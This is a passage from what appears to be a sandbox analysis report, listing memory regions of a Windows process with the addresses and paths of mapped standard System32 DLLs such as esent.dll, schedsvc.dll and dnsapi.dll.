0x7ffbf658ffff entry_point = 0x7ffbf6510000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 5706 start_va = 0x7ffbf6590000 end_va = 0x7ffbf65a4fff entry_point = 0x7ffbf6590000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 5707 start_va = 0x7ffbf65b0000 end_va = 0x7ffbf65c9fff entry_point = 0x7ffbf65b0000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 5708 start_va = 0x7ffbf69c0000 end_va = 0x7ffbf69dcfff entry_point = 0x7ffbf69c0000 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 5709 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a17fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 5710 start_va = 0x7ffbf6a20000 end_va = 0x7ffbf6a36fff entry_point = 0x7ffbf6a20000 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 5711 start_va = 0x7ffbf6a40000 end_va = 0x7ffbf6a5cfff entry_point = 0x7ffbf6a40000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 5712 start_va = 0x7ffbf6f50000 end_va = 0x7ffbf6f61fff entry_point = 0x7ffbf6f50000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 5713 start_va = 0x7ffbf6f70000 end_va = 0x7ffbf6fb5fff entry_point = 0x7ffbf6f70000 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 5714 start_va = 0x7ffbf7160000 end_va = 0x7ffbf7441fff entry_point = 0x7ffbf7160000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 5715 start_va = 0x7ffbf74e0000 end_va = 0x7ffbf751ffff entry_point = 0x7ffbf74e0000 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 5716 start_va = 0x7ffbf7520000 end_va = 0x7ffbf7567fff entry_point = 0x7ffbf7520000 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 5717 start_va = 0x7ffbf7570000 end_va = 0x7ffbf7580fff entry_point = 0x7ffbf7570000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 5718 start_va = 0x7ffbf7590000 end_va = 0x7ffbf759cfff entry_point = 0x7ffbf7590000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 5719 start_va = 0x7ffbf7b30000 end_va = 0x7ffbf7b3dfff entry_point = 0x7ffbf7b30000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 5720 start_va = 0x7ffbf9250000 end_va = 0x7ffbf9264fff entry_point = 0x7ffbf9250000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 5721 start_va = 0x7ffbf9270000 end_va = 0x7ffbf92b0fff entry_point = 0x7ffbf9270000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 5722 start_va = 0x7ffbf9810000 end_va = 0x7ffbf982cfff entry_point = 0x7ffbf9810000 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 5723 start_va = 0x7ffbf9830000 end_va = 0x7ffbf9893fff entry_point = 0x7ffbf9830000 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 5724 start_va = 0x7ffbf99c0000 end_va = 0x7ffbf9a1efff entry_point = 0x7ffbf99c0000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 5725 start_va = 0x7ffbf9aa0000 end_va = 0x7ffbf9ab7fff entry_point = 0x7ffbf9aa0000 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 5726 start_va = 0x7ffbf9ac0000 end_va = 0x7ffbf9ae2fff entry_point = 0x7ffbf9ac0000 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 5727 start_va = 0x7ffbf9b00000 end_va = 0x7ffbf9b14fff entry_point = 0x7ffbf9b00000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 5728 start_va = 0x7ffbf9b20000 end_va = 0x7ffbf9b64fff entry_point = 0x7ffbf9b20000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 5729 start_va = 0x7ffbf9b70000 end_va = 0x7ffbf9b83fff entry_point = 0x7ffbf9b70000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 5730 start_va = 0x7ffbf9b90000 end_va = 0x7ffbf9c80fff entry_point = 0x7ffbf9b90000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 5731 start_va = 0x7ffbf9d80000 end_va = 0x7ffbf9d9bfff entry_point = 0x7ffbf9d80000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5732 start_va = 0x7ffbf9da0000 end_va = 0x7ffbf9db7fff entry_point = 0x7ffbf9da0000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 5733 start_va = 0x7ffbf9dc0000 end_va = 0x7ffbf9f42fff entry_point = 0x7ffbf9dc0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 5734 start_va = 0x7ffbf9f50000 end_va = 0x7ffbf9f59fff entry_point = 0x7ffbf9f50000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5735 start_va = 0x7ffbf9f80000 end_va = 0x7ffbfa01efff entry_point = 0x7ffbf9f80000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 5736 start_va = 0x7ffbfa020000 end_va = 0x7ffbfa07afff entry_point = 0x7ffbfa020000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 5737 start_va = 0x7ffbfa080000 end_va = 0x7ffbfa0adfff entry_point = 0x7ffbfa080000 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 5738 start_va = 0x7ffbfa0b0000 end_va = 0x7ffbfa10cfff entry_point = 0x7ffbfa0b0000 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 5739 start_va = 0x7ffbfa110000 end_va = 0x7ffbfa12ffff entry_point = 0x7ffbfa110000 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 5740 start_va = 0x7ffbfa130000 end_va = 0x7ffbfa137fff entry_point = 0x7ffbfa130000 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 5741 start_va = 0x7ffbfa140000 end_va = 0x7ffbfa150fff entry_point = 0x7ffbfa140000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 5742 start_va = 0x7ffbfa160000 end_va = 0x7ffbfa1defff entry_point = 0x7ffbfa160000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 5743 start_va = 0x7ffbfa1e0000 end_va = 0x7ffbfa21bfff entry_point = 0x7ffbfa1e0000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 5744 start_va = 0x7ffbfa220000 end_va = 0x7ffbfa25efff entry_point = 0x7ffbfa220000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 5745 start_va = 0x7ffbfa410000 end_va = 0x7ffbfa45bfff entry_point = 0x7ffbfa410000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 5746 start_va = 0x7ffbfaa10000 end_va = 0x7ffbfaa26fff entry_point = 0x7ffbfaa10000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5747 start_va = 0x7ffbfb2b0000 end_va = 0x7ffbfb2bbfff entry_point = 0x7ffbfb2b0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 5748 start_va = 0x7ffbfb2c0000 end_va = 0x7ffbfb2c9fff entry_point = 0x7ffbfb2c0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 5749 start_va = 0x7ffbfba10000 end_va = 0x7ffbfba36fff entry_point = 0x7ffbfba10000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 5750 start_va = 0x7ffbfba50000 end_va = 0x7ffbfbae1fff entry_point = 0x7ffbfba50000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 5751 start_va = 0x7ffbfbaf0000 end_va = 0x7ffbfbb28fff entry_point = 0x7ffbfbaf0000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 5752 start_va = 0x7ffbfbb30000 end_va = 0x7ffbfbb38fff entry_point = 0x7ffbfbb30000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 5753 start_va = 0x7ffbfbb40000 end_va = 0x7ffbfbc15fff entry_point = 0x7ffbfbb40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 5754 start_va = 0x7ffbfbce0000 end_va = 0x7ffbfbd11fff entry_point = 0x7ffbfbce0000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 5755 start_va = 0x7ffbfbd20000 end_va = 0x7ffbfbd54fff entry_point = 0x7ffbfbd20000 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 5756 start_va = 0x7ffbfbe40000 end_va = 0x7ffbfbe75fff entry_point = 0x7ffbfbe40000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 5757 start_va = 0x7ffbfc980000 end_va = 0x7ffbfc988fff entry_point = 0x7ffbfc980000 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 5758 start_va = 0x7ffbfc990000 end_va = 0x7ffbfc9bcfff entry_point = 0x7ffbfc990000 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 5759 start_va = 0x7ffbfc9c0000 end_va = 0x7ffbfc9cffff entry_point = 0x7ffbfc9c0000 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 5760 start_va = 0x7ffbfc9d0000 end_va = 0x7ffbfca20fff entry_point = 0x7ffbfc9d0000 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 5761 start_va = 0x7ffbfca30000 end_va = 0x7ffbfca3bfff entry_point = 0x7ffbfca30000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 5762 start_va = 0x7ffbfca40000 end_va = 0x7ffbfcafdfff entry_point = 0x7ffbfca40000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 5763 start_va = 0x7ffbfcbc0000 end_va = 0x7ffbfccf0fff entry_point = 0x7ffbfcbc0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 5764 start_va = 0x7ffbfcd00000 end_va = 0x7ffbfcd3dfff entry_point = 0x7ffbfcd00000 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 5765 start_va = 0x7ffbfcd40000 end_va = 0x7ffbfcdd5fff entry_point = 0x7ffbfcd40000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 5766 start_va = 0x7ffbfcde0000 end_va = 0x7ffbfcdf7fff entry_point = 0x7ffbfcde0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5767 start_va = 0x7ffbfce00000 end_va = 0x7ffbfceb3fff entry_point = 0x7ffbfce00000 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 5768 start_va = 0x7ffbfced0000 end_va = 0x7ffbfcf37fff entry_point = 0x7ffbfced0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 5769 start_va = 0x7ffbfcfa0000 end_va = 0x7ffbfcfb9fff entry_point = 0x7ffbfcfa0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 5770 start_va = 0x7ffbfcfc0000 end_va = 0x7ffbfcfd5fff entry_point = 0x7ffbfcfc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 5771 start_va = 0x7ffbfd180000 end_va = 0x7ffbfd18ffff entry_point = 0x7ffbfd180000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 5772 start_va = 0x7ffbfd2d0000 end_va = 0x7ffbfd2dffff entry_point = 0x7ffbfd2d0000 region_type = mapped_file name = "timebrokerclient.dll" filename = "\\Windows\\System32\\TimeBrokerClient.dll" (normalized: "c:\\windows\\system32\\timebrokerclient.dll") Region: id = 5773 start_va = 0x7ffbfd2e0000 end_va = 0x7ffbfd30dfff entry_point = 0x7ffbfd2e0000 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 5774 start_va = 0x7ffbfd310000 end_va = 0x7ffbfd33cfff entry_point = 0x7ffbfd310000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 5775 start_va = 0x7ffbfd340000 end_va = 0x7ffbfd355fff entry_point = 0x7ffbfd340000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5776 start_va = 0x7ffbfd360000 end_va = 0x7ffbfd3cdfff entry_point = 0x7ffbfd360000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 5777 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5778 start_va = 0x7ffbfd810000 end_va = 0x7ffbfd820fff entry_point = 0x7ffbfd810000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 5779 start_va = 0x7ffbfd830000 end_va = 0x7ffbfd83cfff entry_point = 0x7ffbfd830000 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 5780 start_va = 0x7ffbfd840000 end_va = 0x7ffbfd87ffff entry_point = 0x7ffbfd840000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 5781 start_va = 0x7ffbfd880000 end_va = 0x7ffbfd97bfff entry_point = 0x7ffbfd880000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 5782 start_va = 0x7ffbfd980000 end_va = 0x7ffbfd9c1fff entry_point = 0x7ffbfd980000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 5783 start_va = 0x7ffbfd9d0000 end_va = 0x7ffbfd9e6fff entry_point = 0x7ffbfd9d0000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 5784 start_va = 0x7ffbfd9f0000 end_va = 0x7ffbfdaaffff entry_point = 0x7ffbfd9f0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 5785 start_va = 0x7ffbfdab0000 end_va = 0x7ffbfdacdfff entry_point = 0x7ffbfdab0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 5786 start_va = 0x7ffbfdad0000 end_va = 0x7ffbfdaf6fff entry_point = 0x7ffbfdad0000 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 5787 start_va = 0x7ffbfdb00000 end_va = 0x7ffbfdb79fff entry_point = 0x7ffbfdb00000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 5788 start_va = 0x7ffbfdb80000 end_va = 0x7ffbfdbd4fff entry_point = 0x7ffbfdb80000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 5789 start_va = 0x7ffbfdbf0000 end_va = 0x7ffbfdc02fff entry_point = 0x7ffbfdbf0000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 5790 start_va = 0x7ffbfdc10000 end_va = 0x7ffbfdc19fff entry_point = 0x7ffbfdc10000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5791 start_va = 0x7ffbfdc20000 end_va = 0x7ffbfdc37fff entry_point = 0x7ffbfdc20000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 5792 start_va = 0x7ffbfdc40000 end_va = 0x7ffbfdd8cfff entry_point = 0x7ffbfdc40000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 5793 start_va = 0x7ffbfdea0000 end_va = 0x7ffbfdeaafff entry_point = 0x7ffbfdea0000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 5794 start_va = 0x7ffbfdeb0000 end_va = 0x7ffbfdf14fff entry_point = 0x7ffbfdeb0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 5795 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5796 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5797 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5798 start_va = 0x7ffbff0d0000 end_va = 0x7ffbff147fff entry_point = 0x7ffbff0d0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 5799 start_va = 0x7ffbff210000 end_va = 0x7ffbff236fff entry_point = 0x7ffbff210000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 5800 start_va = 0x7ffbff3f0000 end_va = 0x7ffbff3fbfff entry_point = 0x7ffbff3f0000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 5801 start_va = 0x7ffbff5d0000 end_va = 0x7ffbff601fff entry_point = 0x7ffbff5d0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 5802 start_va = 0x7ffbff610000 end_va = 0x7ffbff691fff entry_point = 0x7ffbff610000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 5803 start_va = 0x7ffbff7c0000 end_va = 0x7ffbff7e2fff entry_point = 0x7ffbff7c0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 5804 start_va = 0x7ffbff8f0000 end_va = 0x7ffbff8fbfff entry_point = 0x7ffbff8f0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 5805 start_va = 0x7ffbff9b0000 end_va = 0x7ffbff9f7fff entry_point = 0x7ffbff9b0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 5806 start_va = 0x7ffbffad0000 end_va = 0x7ffbffaebfff entry_point = 0x7ffbffad0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 5807 start_va = 0x7ffbffaf0000 end_va = 0x7ffbffafbfff entry_point = 0x7ffbffaf0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5808 start_va = 0x7ffbffb00000 end_va = 0x7ffbffb25fff entry_point = 0x7ffbffb00000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5809 start_va = 0x7ffbffbe0000 end_va = 0x7ffbffc11fff entry_point = 0x7ffbffbe0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 5810 start_va = 0x7ffbffcc0000 end_va = 0x7ffbffcc9fff entry_point = 0x7ffbffcc0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 5811 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5812 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5813 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5814 start_va = 0x7ffbffed0000 end_va = 0x7ffbfff0dfff entry_point = 0x7ffbffed0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5815 start_va = 0x7ffbfff10000 end_va = 0x7ffbfffb7fff entry_point = 0x7ffbfff10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5816 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5817 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5818 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: 